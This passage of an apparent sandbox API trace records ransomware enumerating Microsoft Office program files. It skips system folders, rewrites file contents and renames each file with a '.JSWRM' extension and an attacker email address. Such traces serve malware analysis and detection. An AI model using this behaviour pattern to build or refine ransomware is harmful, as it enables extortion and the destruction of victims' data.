returned -1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="recovery") returned -1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="perflogs") returned -1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="documents and settings") returned 1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="$RECYCLE.BIN") returned 1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="system volume information") returned -1 [0136.017] lstrcmpiW (lpString1="mscss7cm_fr.dub", lpString2="msocache") returned -1 [0136.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_fr.dub", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_fr.dub", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7cm_fr.dub", lpUsedDefaultChar=0x0) returned 15 [0136.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_fr.dub", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0136.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7cm_fr.dub", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7cm_fr.dub", lpUsedDefaultChar=0x0) returned 15 [0136.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_fr.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_fr.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.018] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3072) returned 1 [0136.018] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.018] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc00, lpOverlapped=0x0) returned 1 [0136.049] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.049] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc00, lpOverlapped=0x0) returned 1 [0136.049] CloseHandle (hObject=0x45c) returned 1 [0136.049] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_fr.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_fr.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7cm_fr.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7cm_fr.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.052] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc522eecb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc522eecb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd8a8396f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90278, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7en.dll", cAlternateFileName="")) returned 1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2=".") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="..") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="...") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="windows") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="recovery") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="perflogs") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="documents and settings") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="system volume information") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7en.dll", lpString2="msocache") returned -1 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7en.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7en.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7en.dll", lpUsedDefaultChar=0x0) returned 12 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7en.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7en.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7en.dll", lpUsedDefaultChar=0x0) returned 12 [0136.052] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4db6809, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4db6809, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd97ecd84, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90278, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7es.dll", cAlternateFileName="")) returned 1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2=".") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="..") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="...") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="windows") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="recovery") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="perflogs") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="documents and settings") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="system volume information") returned -1 [0136.052] lstrcmpiW (lpString1="mscss7es.dll", lpString2="msocache") returned -1 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7es.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7es.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7es.dll", lpUsedDefaultChar=0x0) returned 12 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7es.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7es.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7es.dll", lpUsedDefaultChar=0x0) returned 12 [0136.052] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5196662, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5196662, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd97ecd84, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90278, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7fr.dll", cAlternateFileName="")) returned 1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2=".") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="..") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="...") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="windows") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="recovery") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="perflogs") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="documents and settings") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="system volume information") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7fr.dll", lpString2="msocache") returned -1 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7fr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7fr.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7fr.dll", lpUsedDefaultChar=0x0) returned 12 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7fr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7fr.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7fr.dll", lpUsedDefaultChar=0x0) returned 12 [0136.053] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5018eb8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5018eb8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd8a8396f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19600, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7wre_en.dub", cAlternateFileName="MSCSS7~1.DUB")) returned 1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2=".") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="..") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="...") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="windows") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="recovery") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="perflogs") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="documents and settings") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="$RECYCLE.BIN") returned 1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="system volume information") returned -1 [0136.053] lstrcmpiW (lpString1="mscss7wre_en.dub", lpString2="msocache") returned -1 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_en.dub", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_en.dub", cchWideChar=16, lpMultiByteStr=0x240fc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7wre_en.dub", lpUsedDefaultChar=0x0) returned 16 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_en.dub", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_en.dub", cchWideChar=16, lpMultiByteStr=0x241178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7wre_en.dub", lpUsedDefaultChar=0x0) returned 16 [0136.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_en.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.055] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=103936) returned 1 [0136.056] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.056] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x19600, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x19600, lpOverlapped=0x0) returned 1 [0136.064] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.064] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x19600, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x19600, lpOverlapped=0x0) returned 1 [0136.065] CloseHandle (hObject=0x45c) returned 1 [0136.065] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_en.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_en.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_en.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.069] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5255140, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5255140, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc5255140, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7wre_es.dub", cAlternateFileName="MSB080~1.DUB")) returned 1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2=".") returned 1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="..") returned 1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="...") returned 1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="windows") returned -1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="recovery") returned -1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="perflogs") returned -1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="documents and settings") returned 1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="$RECYCLE.BIN") returned 1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="system volume information") returned -1 [0136.069] lstrcmpiW (lpString1="mscss7wre_es.dub", lpString2="msocache") returned -1 [0136.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_es.dub", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_es.dub", cchWideChar=16, lpMultiByteStr=0x240ef8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7wre_es.dub", lpUsedDefaultChar=0x0) returned 16 [0136.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_es.dub", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_es.dub", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7wre_es.dub", lpUsedDefaultChar=0x0) returned 16 [0136.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_es.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_es.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.070] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3072) returned 1 [0136.070] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.070] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc00, lpOverlapped=0x0) returned 1 [0136.073] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.073] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc00, lpOverlapped=0x0) returned 1 [0136.073] CloseHandle (hObject=0x45c) returned 1 [0136.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_es.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_es.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_es.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_es.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.074] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc51bc7d4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc51bc7d4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc51bc7d4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mscss7wre_fr.dub", cAlternateFileName="MSCSS7~3.DUB")) returned 1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2=".") returned 1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="..") returned 1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="...") returned 1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="windows") returned -1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="recovery") returned -1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="perflogs") returned -1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="documents and settings") returned 1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="$RECYCLE.BIN") returned 1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="system volume information") returned -1 [0136.074] lstrcmpiW (lpString1="mscss7wre_fr.dub", lpString2="msocache") returned -1 [0136.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_fr.dub", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_fr.dub", cchWideChar=16, lpMultiByteStr=0x2413d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7wre_fr.dub", lpUsedDefaultChar=0x0) returned 16 [0136.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_fr.dub", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mscss7wre_fr.dub", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscss7wre_fr.dub", lpUsedDefaultChar=0x0) returned 16 [0136.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_fr.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_fr.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0136.076] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3072) returned 1 [0136.076] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.076] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0xc00, lpOverlapped=0x0) returned 1 [0136.077] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.078] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0xc00, lpOverlapped=0x0) returned 1 [0136.078] CloseHandle (hObject=0x45c) returned 1 [0136.078] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_fr.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_fr.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mscss7wre_fr.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mscss7wre_fr.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.079] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 